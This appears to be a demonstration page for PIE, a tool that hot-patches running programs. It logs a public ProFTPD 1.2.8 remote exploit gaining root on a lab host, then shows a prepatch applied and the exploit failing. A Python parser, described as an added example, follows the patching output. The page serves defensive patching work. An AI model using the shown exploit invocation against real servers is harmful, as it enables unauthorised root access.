Patch Integration Engine
PIE Working Example

The following is an example of PIE being used to prevent what would otherwise be a successful exploit attempt. For the sake of this example, consider two connected hosts, "target" and "attacker". We first show a successful attack on the ProFTPD server running on "target".



attacker@attacker:~$ ftp target
Connected to target.
220 ProFTPD 1.2.8 Server (ProFTPD Default Installation) [target]
Name (target:attacker): ftp
331 Anonymous login ok, send your complete email address as your password.
Password:
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 root root 48 Aug 26 20:51 incoming
226 Transfer complete.
ftp> exit
221 Goodbye.
attacker@attacker:~$ ./proftpd-not-pro-enough -d incoming target
: proftpd-not-pro-enough : ProFTPD remote exploit for CAN-2003-0831
by Solar Eclipse (solareclipse@phreedom.org)

: connecting to target
220 ProFTPD 1.2.8 Server (ProFTPD Default Installation) [target]

: loging in as anonymous/mozilla@
: using writable directory incoming, filename is ieuzuiqj

: exploiting server (offset 0xffff)
stage1 shellcode failed

: exploiting server (offset 0xfffe)
No reposnse from remote process. It probably crashed with a SIGILL and
is currently consuming 100% CPU. If you succeed in exploiting the server,
remember to kill runaway process

: exploiting server (offset 0xfc17)
stage1 shellcode failed

: exploiting server (offset 0xfc16)
stage1 shellcode failed

: exploiting server (offset 0xd8ef)
Execution of stage1 shellcode succeeded, sending stage2
bash: no job control in this shell
target:/home/ftp# Linux target 2.4.27-2-686 #1 Mon may 16 17:03:22 JST 2005 i686 GNU/Linux
uid=0(root) gid=1000(ftp) groups=1000(ftp),20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev)
07:46:01 up 7:17, 10 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 host:S.0 07:02 3:18 0.03s 0.03s /bin/bash
root pts/2 host:S.1 07:02 1:09 0.02s 0.02s /bin/bash
root pts/3 host:S.2 07:02 42.00s 0.05s 0.01s proftpd: (accep
root pts/5 host:S.4 07:02 35:33 0.01s 0.01s /bin/bash
root pts/6 host:S.5 07:02 43:08 0.01s 0.01s /bin/bash
root pts/7 host:S.6 07:02 43:06 0.01s 0.01s /bin/bash
root pts/8 host:S.7 07:02 43:05 0.01s 0.01s /bin/bash
root pts/10 host:S.9 07:02 3:54 0.02s 0.02s /bin/bash
target:/home/ftp# exit
exit



The attacker has gained root access to the target system. Let us now apply a prepatch for this vulnerability (the prepatch source can be found in the prepatch repository on this website).



target:~/devel# gcc -o proftpd_xlate_write proftpd_xlate_write.c -lpie
target:~/devel# ./proftpd_xlate_write
----------------
begin proftpd_xlate_write.pp
version 0.5
target proftpd
function _xlate_ascii_write
----------------
AV94bGF0ZV9hc2NpaV93cml0ZQA2AAAAVYnlMcmLRQiLAIA4AHQJgDgKdQFBQOvygfkAAgAAfAUxwEDNgItFFFCLRRBQi0UMUItFCFC6u7u7u//Sg8QQycMQAAAA
----------------
target:~/devel# ./proftpd_xlate_write > proftpd_xlate_write.pp
target:~/devel# pfp -v -f _xlate_ascii_write -o proftpd_xlate_write.pf proftpd.unstripped
V: Pfp version 0.5

V: Using binary path: proftpd.unstripped
V: Using function name: _xlate_ascii_write
V: Using output file: proftpd_xlate_write.pf
V: Found text at: 0x2af0 (0x44720 bytes)
V: Found symtab at: 0x58550 (0x5e20 bytes)
V: Found strtab at: 0x5e370 (0x53b8 bytes)
V: Target function match: 0x8061e10
V: Target function offset: 0x17320
V: Target function size: 0x1d0
V: Primary fingerprint structure blocks: 22
V: Primary fingerprint structure links: 34
V: Primary fingerprint outgoing call count: 8
V: Secondary fingerprint incoming call count: 1
V: Secondary fingerprint stack frame size: 0x1c
V: Tertiary fingerprint function map entries: 25
target:~/devel# pie -v proftpd_xlate_write.pp proftpd_xlate_write.pf
V: PIE version: 0.5

V: Linkmap found at: 0x40016ed8

A function has been found that matches the primary fingerprint.

Details:
fingerprint name: _xlate_ascii_write
function offset: 0x17320

structural blocks: 22
structural links: 34
outgoing calls: 8

incoming calls: 1
stack frame size: 0x1c

Options:
1. Use this function
2. Exit without patching

Enter choice [default=2]: 1
V: Function _xlate_ascii_write found at: 0x8061e10
V: Patching target pid: 25937
V: Redirected _xlate_ascii_write to: 0x80990e4
target:~/devel#
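
The fingerprint tiers that pfp computes and pie reports can be modelled directly. The block below is an added example, not part of PIE or of this page; it parses samples constructed from the pfp and pie output shown above and reports which tiers a candidate function reproduces. PIE's real matching rules are not on this page, so the "every attribute of a tier must be equal" comparison is an assumption.

```python
import re

# Sample text constructed from the pfp -v and pie -v transcripts on this page.
PFP_OUTPUT = """\
V: Primary fingerprint structure blocks: 22
V: Primary fingerprint structure links: 34
V: Primary fingerprint outgoing call count: 8
V: Secondary fingerprint incoming call count: 1
V: Secondary fingerprint stack frame size: 0x1c
V: Tertiary fingerprint function map entries: 25
"""
PIE_DETAILS = """\
fingerprint name: _xlate_ascii_write
function offset: 0x17320

structural blocks: 22
structural links: 34
outgoing calls: 8

incoming calls: 1
stack frame size: 0x1c
"""

# pfp label -> common key, and pie "Details:" label -> the same common key.
PFP_LABELS = {"structure blocks": "blocks", "structure links": "links",
              "outgoing call count": "outgoing_calls",
              "incoming call count": "incoming_calls",
              "stack frame size": "stack_frame",
              "function map entries": "map_entries"}
PIE_LABELS = {"structural blocks": "blocks", "structural links": "links",
              "outgoing calls": "outgoing_calls", "incoming calls": "incoming_calls",
              "stack frame size": "stack_frame"}

def parse_pfp(text):
    """Return {tier: {key: int}} from pfp -v output; hex values (0x1c) are accepted."""
    fp = {}
    for m in re.finditer(r"^V: (\w+) fingerprint (.+?): (\S+)$", text, re.M):
        tier, label, value = m.group(1).lower(), m.group(2), m.group(3)
        if label in PFP_LABELS:
            fp.setdefault(tier, {})[PFP_LABELS[label]] = int(value, 0)
    return fp

def parse_pie_details(text):
    """Return {key: int} for the attributes pie prints about the matched function."""
    obs = {}
    for m in re.finditer(r"^([a-z ]+): (\S+)$", text, re.M):
        if m.group(1) in PIE_LABELS:
            obs[PIE_LABELS[m.group(1)]] = int(m.group(2), 0)
    return obs

def match_tiers(fp, obs):
    """Tiers whose every recorded attribute the observed function reproduces (assumed rule)."""
    return [tier for tier, attrs in fp.items()
            if all(k in obs and obs[k] == v for k, v in attrs.items())]
```

On the page's data the primary and secondary tiers match; the tertiary tier cannot be confirmed because pie does not print the function map entry count.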



The main proftpd process has been successfully prepatched. It is now time to attempt the exploit once again.



attacker@attacker:~$ ./proftpd-not-pro-enough -d incoming target
: proftpd-not-pro-enough : ProFTPD remote exploit for CAN-2003-0831
by Solar Eclipse (solareclipse@phreedom.org)

: connecting to target
220 ProFTPD 1.2.8 Server (ProFTPD Default Installation) [target]

: loging in as anonymous/mozilla@
: using writable directory incoming, filename is ilxbifpk

: exploiting server (offset 0xffff)
stage1 shellcode failed

: exploiting server (offset 0xfffe)
stage1 shellcode failed

: exploiting server (offset 0xfc17)
stage1 shellcode failed

: exploiting server (offset 0xfc16)
stage1 shellcode failed

: exploiting server (offset 0xd8ef)
stage1 shellcode failed

: exploiting server (offset 0xd8ee)
stage1 shellcode failed

Exploit failed. :-(
attacker@attacker:~$ ftp target
Connected to target.
220 ProFTPD 1.2.8 Server (ProFTPD Default Installation) [target]
Name (target:attacker): ftp
331 Anonymous login ok, send your complete email address as your password.
Password:
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 root root 48 Aug 26 20:51 incoming
226 Transfer complete.
ftp> exit
221 Goodbye.



The exploit has failed, and the ftp server is still in working condition.


Copyright (C) 2004, Ben Hawkes